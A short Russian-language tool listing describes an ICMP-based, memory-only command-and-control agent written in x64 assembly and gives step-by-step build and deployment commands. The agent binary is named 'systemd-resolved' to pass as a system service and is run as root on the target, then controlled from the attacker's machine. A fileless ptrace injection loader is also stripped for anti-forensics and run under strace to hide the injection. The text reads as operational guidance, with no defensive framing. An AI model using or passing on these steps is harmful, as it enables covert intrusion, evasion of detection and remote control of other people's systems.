Exploitation
C2-фреймворк, написанный целиком на x64 Linux Assembly без libc. Канал управления — сырые ICMP-пакеты (скрытый трафик под видом ping). Агент живёт исключительно в RAM: нет записей на диск, …
Установка
# Требования: nasm, GNU ld (binutils), root (raw ICMP socket), Linux x86_64
git clone https://codeberg.org/JM00NJ/ICMP-Ghost-A-Fileless-x64-Assembly-C2-Agent
cd ICMP-Ghost-A-Fileless-x64-Assembly-C2-Agent
# Сборка агента (имя ≥15 символов для корректного argv[0]-overwrite)
nasm -f elf64 sniff.asm -o sniff.o && ld sniff.o -o systemd-resolved
# Сборка клиента (на машине атакующего)
nasm -f elf64 client.asm -o client.o && ld client.o -o client
# Развёртывание на цели (root required — raw ICMP socket)
sudo ./systemd-resolved
# Управление с машины атакующего
sudo ./client
# ── Phantom Loader (fileless ptrace injection) ────────────────────────────
cd Phantom_Loader
# Отредактировать loader.asm: вписать имя целевого процесса (hardcoded)
# Сборка загрузчика
nasm -f elf64 loader.asm -o loader.o && ld loader.o -o loader
strip --strip-all loader # anti-forensics
# Инъекция в существующий процесс (strace = LotL-маскировка ptrace-события)
sudo strace ./loader